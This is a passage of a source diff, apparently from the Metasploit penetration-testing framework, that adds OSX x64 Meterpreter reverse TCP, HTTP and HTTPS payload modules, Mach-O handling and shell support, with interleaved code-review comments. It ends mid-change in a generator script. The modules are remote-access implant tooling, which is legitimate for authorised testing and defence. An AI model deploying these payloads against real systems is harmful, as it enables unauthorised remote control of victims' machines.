diff --git a/Gemfile.lock b/Gemfile.lock
index b0ad333b5b27..ba7dbd295d07 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -30,7 +30,7 @@ PATH
 metasploit-model
 metasploit-payloads (= 1.2.37)
 metasploit_data_models
- metasploit_payloads-mettle (= 0.1.10)
+ metasploit_payloads-mettle (= 0.1.14)
 msgpack
 nessus_rest
 net-ssh
@@ -189,7 +189,7 @@ GEM
 postgres_ext
 railties (~> 4.2.6)
 recog (~> 2.0)
- metasploit_payloads-mettle (0.1.10)
+ metasploit_payloads-mettle (0.1.14)
 method_source (0.8.2)
 mini_portile2 (2.2.0)
 minitest (5.10.2)
diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb
new file mode 100644
index 000000000000..2e507e90550b
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
+ def supports_ssl?
+ false
+ end
+ def supports_zlib?
+ false
+ end
+ def initialize(rstream, opts={})
+ super
+ self.base_platform = 'osx'
+ self.base_arch = ARCH_X64
+ end
+end
+
+end
+end
+
diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb
new file mode 100644
index 000000000000..c7e25efac942
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
+ def supports_ssl?
+ false
+ end
+ def supports_zlib?
+ false
+ end
+ def initialize(rstream, opts={})
+ super
+ self.base_platform = 'osx'
+ self.base_arch = ARCH_X86
+ end
+end
+
+end
+end
+
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 9516e3ac6a9d..279d249a0ab5 100644
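Review bot: The header comment in `meterpreter_x64_osx.rb` (and the identical one in `meterpreter_x86_osx.rb`) names neither the platform nor the architecture, and neither file says why `supports_ssl?` and `supports_zlib?` return `false`. A class comment naming the target, for example `# Meterpreter session type for OSX x64 targets`, plus one line above the two predicates giving the reason they are disabled, would spare the next reader a search through the base class. The two files differ only in the class name and `base_arch`, and nothing else in this diff refers to `Meterpreter_x86_OSX` (the generator gains only an x64 OSX row), so the x86 class looks unused for now. The three methods would also read more easily with a blank line between them.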
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -106,7 +106,7 @@ def self.to_zip(files)
 # @return [String]
 # @return [NilClass]
 def self.to_executable(framework, arch, plat, code = '', opts = {})
- if elf? code
+ if elf? code or macho? code
 return code
 end
@@ -2148,15 +2148,19 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 end
 end
 when 'macho', 'osx-app'
- macho = case arch
- when ARCH_X86,nil
- to_osx_x86_macho(framework, code, exeopts)
- when ARCH_X64
- to_osx_x64_macho(framework, code, exeopts)
- when ARCH_ARMLE
- to_osx_arm_macho(framework, code, exeopts)
- when ARCH_PPC
- to_osx_ppc_macho(framework, code, exeopts)
+ if macho? code
+ macho = code
+ else
+ macho = case arch
+ when ARCH_X86,nil
+ to_osx_x86_macho(framework, code, exeopts)
+ when ARCH_X64
+ to_osx_x64_macho(framework, code, exeopts)
+ when ARCH_ARMLE
+ to_osx_arm_macho(framework, code, exeopts)
+ when ARCH_PPC
+ to_osx_ppc_macho(framework, code, exeopts)
+ end
 end
 fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
 when 'vba'
@@ -2284,6 +2288,10 @@ def self.elf?(code)
 code[0..3] == "\x7FELF"
 end
+ def self.macho?(code)
+ code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
+ end
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 1933f869e971..4e9e0079b266 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -259,7 +259,7 @@ def cmd_shell(*args)
 print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
 cmd_execute("-f", path, "-c", "-H", "-i")
 end
- when 'linux'
+ when 'linux', 'osx'
 # Don't expand_path() this because it's literal anyway
 path = "/bin/sh"
 cmd_execute("-f", path, "-c", "-i")
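Review bot: In the first exe.rb hunk, `to_executable` now returns `code` untouched as soon as `macho? code` is true, before `arch` or `plat` is consulted, so a buffer with a matching four-byte prefix is handed back whatever target the caller asked for. The `'macho', 'osx-app'` branch of `to_executable_fmt` in the second hunk makes the same shortcut. If that is intended, it should be stated in the `@return` docs above `to_executable`. The condition only parses as two calls because `or` binds looser than a paren-less call; `if elf?(code) || macho?(code)` says the same thing without relying on that. Both methods continue outside their hunks.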
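Review bot: `macho?` in the third exe.rb hunk compares `code[0..3]` with literals that hold bytes above 0x7F, and Ruby treats two such strings as unequal when their encodings differ even if the bytes are identical; `elf?` is not exposed to this because its literal is ASCII-only. Whether it bites depends on this file's magic comment and on how callers tag `code`, neither of which is visible here. An encoding-independent form is `[0xCFFAEDFE, 0xCEFAEDFE, 0xCAFEBABE].include?(code.unpack('N').first)`. The fat-binary magic `\xCA\xFE\xBA\xBE` is also the Java class-file magic, and the big-endian thin magic `\xFE\xED\xFA\xCE` is not matched although `to_executable_fmt` still has an `ARCH_PPC` branch. A comment naming what each constant stands for would make both choices explicit.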
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index f4e586e7986e..68cdb6e9245d 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
 # Needed for Meterpreter
 spec.add_runtime_dependency 'metasploit-payloads', '1.2.37'
 # Needed for the next-generation POSIX Meterpreter
- spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10'
+ spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
 # Needed by msfgui and other rpc components
 spec.add_runtime_dependency 'msgpack'
 # get list of network interfaces, like eth* from OS.
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
index fe533ba2e2a4..17b86565e019 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 652264
+ CachedSize = 675048
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
index b7ec5eaf2304..912276538071 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 652264
+ CachedSize = 675048
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
index 8f52504dbb9e..f407e0daf0e0 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 652264
+ CachedSize = 675048
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
index efd415b4f84c..6c876d1bee4b 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 645136
+ CachedSize = 668360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
index 8f1e1ee119c4..b77e2f7c23a5 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 645136
+ CachedSize = 668360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index ff65f14f9e9f..3bd0c0e77de0 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 645136
+ CachedSize = 668360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
index 54bd7d06c7e7..e643614ecfb3 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 643904
+ CachedSize = 666624
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
index c8c58653c90d..0c07ad94cfb2 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 643904
+ CachedSize = 666624
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index a156cecc4b6e..51db411ca4b1 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 643904
+ CachedSize = 666624
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
index 1316f50c33b6..a09f014fde7d 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1028600
+ CachedSize = 1059232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index ee2989048afb..5abfa80bc923 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1028600
+ CachedSize = 1059232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index bf4087480495..f468ddbadaae 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1028600
+ CachedSize = 1059232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index dd52bbdcb134..50d9bf8fd435 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007024
+ CachedSize = 1037012
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index c77c364f8ea6..c061ad76039e 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007024
+ CachedSize = 1037012
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index 7484609efa9f..af9d102c5000 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007024
+ CachedSize = 1037012
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index 0c9523f14b6a..e458dea19c22 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007120
+ CachedSize = 1036276
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index 4ccc63a1b8e4..c4909660cdc5 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007120
+ CachedSize = 1036276
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index 80f10850367f..e713c3d24bee 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 1007120
+ CachedSize = 1036276
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
index 884f95a9e432..13eb0ba7af9c 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 789100
+ CachedSize = 789164
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
index 5d26e63a253a..a09a19a99cd6 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 789100
+ CachedSize = 789164
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
index 84c45966ce9d..157791c38f4f 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 789100
+ CachedSize = 789164
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
index 251f57fa6a55..b6e36369ca87 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 790264
+ CachedSize = 855864
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
index 92af2311c424..c9a316920db9 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 790264
+ CachedSize = 855864
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
index 1e7f8aa3b751..ffb57406a205 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 790264
+ CachedSize = 855864
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index 18f404a24730..1b8616e199fa 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 704512
+ CachedSize = 729120
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index c0f52dbf15db..0a39b3bc0b9e 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 704512
+ CachedSize = 729120
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index e25a8a17f494..a570d615ae07 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 704512
+ CachedSize = 729120
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 3b829a34eac9..37ceede91fee 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 744060
+ CachedSize = 772796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index 0aaaa207df61..829b48db4f4a 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 744060
+ CachedSize = 772796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index 467fc900fb2e..9117fdcca985 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 744060
+ CachedSize = 772796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index c00ef067ae1d..c5fa02fd76ed 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 868848
+ CachedSize = 893496
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index 22b5d30a1b14..97c407564038 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 868848
+ CachedSize = 893496
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index 8da93cb5f79c..423e829dd35e 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 module MetasploitModule
- CachedSize = 868848
+ CachedSize = 893496
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
new file mode 100644
index 000000000000..0bb2dace76ec
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+ CachedSize = 618316
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'OSX Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_x64_OSX
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'http',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
new file mode 100644
index 000000000000..2f080499766c
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+ CachedSize = 618316
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'OSX Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_x64_OSX
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'https',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
new file mode 100644
index 000000000000..43070ef0ae55
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+ CachedSize = 618316
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'OSX Meterpreter, Reverse TCP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_x64_OSX
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'tcp',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb
index 91d8bbb520a8..967a051b81c3 100755
--- a/tools/modules/generate_mettle_payloads.rb
+++ b/tools/modules/generate_mettle_payloads.rb
@@ -12,32 +12,36 @@
 ]
 arches = [
- ['aarch64', 'aarch64-linux-musl'],
- ['armbe', 'armv5b-linux-musleabi'],
- ['armle', 'armv5l-linux-musleabi'],
- ['mips64', 'mips64-linux-muslsf'],
- ['mipsbe', 'mips-linux-muslsf'],
- ['mipsle', 'mipsel-linux-muslsf'],
- ['ppc', 'powerpc-linux-muslsf'],
- ['ppc64le', 'powerpc64le-linux-musl'],
- ['x64', 'x86_64-linux-musl'],
- ['x86', 'i486-linux-musl'],
- ['zarch', 's390x-linux-musl'],
+ ['aarch64','Linux', 'aarch64-linux-musl'],
+ ['armbe', 'Linux', 'armv5b-linux-musleabi'],
+ ['armle', 'Linux', 'armv5l-linux-musleabi'],
+ ['mips64', 'Linux', 'mips64-linux-muslsf'],
+ ['mipsbe', 'Linux', 'mips-linux-muslsf'],
+ ['mipsle', 'Linux', 'mipsel-linux-muslsf'],
+ ['ppc', 'Linux', 'powerpc-linux-muslsf'],
+ ['ppc64le','Linux', 'powerpc64le-linux-musl'],
+ ['x64', 'Linux', 'x86_64-linux-musl'],
+ ['x86', 'Linux', 'i486-linux-musl'],
+ ['zarch', 'Linux', 's390x-linux-musl'],
+ ['x64', 'OSX', 'x86_64-apple-darwin'],
 ]
 arch = ''
 payload = ''
+platform = ''
 scheme = ''
 cwd = File::dirname(__FILE__)
-template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb'))
-renderer = ERB.new(template)
-arches.each do |a, p|
+arches.each do |a, pl, pa|
 schemes.each do |s|
 arch = a
- payload = p
+ platform = pl
+ payload = pa
 scheme = s
- filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb")
+
+ template = File::read(File::join(cwd, "meterpreter_reverse.erb"))
+ renderer = ERB.new(template)
